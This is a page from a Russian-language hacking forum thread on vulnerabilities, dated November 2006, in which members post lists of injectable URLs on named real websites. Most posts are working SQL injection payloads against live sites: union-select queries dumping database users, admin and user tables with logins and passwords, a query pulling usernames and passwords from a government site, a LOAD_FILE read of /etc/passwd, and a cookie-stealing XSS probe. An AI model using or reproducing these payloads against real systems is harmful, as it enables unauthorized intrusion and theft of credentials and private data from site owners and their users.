HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #121  
Старый 07.11.2006, 03:30
pop_korn
Участник форума
Регистрация: 13.09.2005
Сообщений: 170
Провел на форуме:
483324

Репутация: 92
По умолчанию

Цитата:
http://www.raggame.ru/characters.asp?p_ind=27'
странно, помню в начале лета находил вот это:
http://www.raggame.ru/news.asp?id=558&board=1'

о баги не сообщал, через неделю его уже небыло, щас снова появилась... мистика ?
притом, вообще на сайте небыло никаких ошибок, щас смотрю вообще ничего не фильтруется

http://www.raggame.ru/default.asp?p_ind=116'&cl_id=
http://www.raggame.ru/default.asp?p_ind=116&cl_id='

вот только как заюзать хз, там вместе с insert запрос идет
 
Ответить с цитированием

  #122  
Старый 09.11.2006, 21:45
guest3297
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520

Репутация: 2996


Exclamation

http://rinar.net/index.cgi?c=content&id=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(USER(), 0x71),0x71),4,5,6,7,8,9/*

http://nornat.net/index.cgi?c=content&id=-1+union+select+1,2,333333333,4,5,6,7,8,9/*

http://nornat.net/index.cgi?c=news&show=9999+union+select+1,2,3,4,5, 6,7+from+admin/*

http://zemliachestvo.com/religion/look.php?razdel=-1+union+select+1,2,3,4,5,AES_DECRYPT(AES_ENCRYPT(U SER(),0x71),0x71),7,8,9,10/*
 
Ответить с цитированием

  #123  
Старый 11.11.2006, 15:39
ka1r
Новичок
Регистрация: 11.11.2006
Сообщений: 5
Провел на форуме:
75516

Репутация: 1
По умолчанию

http://studybank.info/viewdetails.php?id=-306%20union%20select%201,email,3,4,5,username,7,8, 9 ,10,11,12,13,14%20from%20user/* здесь в таблице будет написан логин и пароль, а вот на фтп с этим не попадешь!
 
Ответить с цитированием

  #124  
Старый 11.11.2006, 17:12
ka1r
Новичок
Регистрация: 11.11.2006
Сообщений: 5
Провел на форуме:
75516

Репутация: 1
По умолчанию

http://www.olprint.ru/catalog.php?id=363'

http://www.lasoon.com.ua/rus/news_big.php?id=-363%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20/*

http://www.travelonline.ru/act.php?pg=shop_razdel&cat2=-310&id=363'%20union%20select%201,2,3,4,5,6,7,8,9,1 0,11,12,13,14,15,16,17/*
dalbwe He cmor

http://www.stena.ru/portfolio-det.php?page=15&id=21'

http://privet.zp.ua/place.php3?id=21'%20union%20select%201,2,3,4,5,6,7 ,8,9,10,11,12,13,14,15,16,17/*

http://www.eatoutnewyork.com/orgs/show.php?ID=21'

http://www.chayclub.ru/index.php?page=63&id=21'

http://www.spektr-21.ru/read.phtm?id=21%20adnd%201=2
 
Ответить с цитированием

  #125  
Старый 13.11.2006, 03:42
guest3297
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520

Репутация: 2996


По умолчанию

Мобильные порталы.
http://www.riot.ru/index.php?read&id=-1+union+select+user(),database()/*
http://myppc.ru/2006/10/26/-1'+union+select+1/*.html

Новостной портал.
http://media.molgvard.ru/index.php?action=showpic&cat=110&pic=1+union+selec t+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/*
 
Ответить с цитированием

  #126  
Старый 14.11.2006, 02:34
guest3297
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520

Репутация: 2996


По умолчанию

Уязвимость найденна не мной.
+toxa+


http://www.president.gov.mk/admin/
http://www.president.gov.mk/info.asp?SectionID=11&InfoID=1+or+1=(SELECT+TOP+1+ cast(UserID+as+nvarchar)%2B%27%3A%27%2Bcast(Userna me+as+nvarchar)%2B%27%3A%27%2Bcast(Password+as+nva rchar)+FROM+Users+where+UserID=1)--#top
 
Ответить с цитированием

  #127  
Старый 14.11.2006, 02:35
pop_korn
Участник форума
Регистрация: 13.09.2005
Сообщений: 170
Провел на форуме:
483324

Репутация: 92
По умолчанию

http://www.comdig.org/topic.php?id_forum=-11+UNION+SELECT+1,2,3,4,5,6,database(),8,9,0,1,2,3 ,4/*

+xss

http://www.comdig.org/index.php?id_issue=2006.21%3Cscript%3Ealert(docume nt.cookie)%3C/script%3E
 
Ответить с цитированием

  #128  
Старый 15.11.2006, 00:57
guest3297
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520

Репутация: 2996


По умолчанию

Еще 1 шоп.
_http://www.edgeshop.ru/edge2.php?Id=326+union+select+concat(database(),ch ar(58),char(60,104,49,62,72,97,99,107,99,101,100,3 2,98,121,32,99,97,115,104,60,47,104,49,62))/*
 
Ответить с цитированием

  #129  
Старый 15.11.2006, 10:50
InferNo23
Участник форума
Регистрация: 05.09.2006
Сообщений: 187
Провел на форуме:
6860213

Репутация: 378
По умолчанию

MosTrud - Московская биржа трудa
Код:
http://www.mostrud.ru/partn.php?pid=120%20union%20select%20USER(),VERSION(),3,4,5/*
и etc/passwd/ ...

Код:
http://www.mostrud.ru/partn.php?pid=120%20union%20select%20USER(),VERSION(),3,4,LOAD_FILE('/etc/passwd')/*

Последний раз редактировалось InferNo23; 15.11.2006 в 10:52..
 
Ответить с цитированием

  #130  
Старый 16.11.2006, 01:03
pop_korn
Участник форума
Регистрация: 13.09.2005
Сообщений: 170
Провел на форуме:
483324

Репутация: 92
По умолчанию

http://www.stumptuous.com/cms/displaysection.php?sid=-1+union+select+1,2/*
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ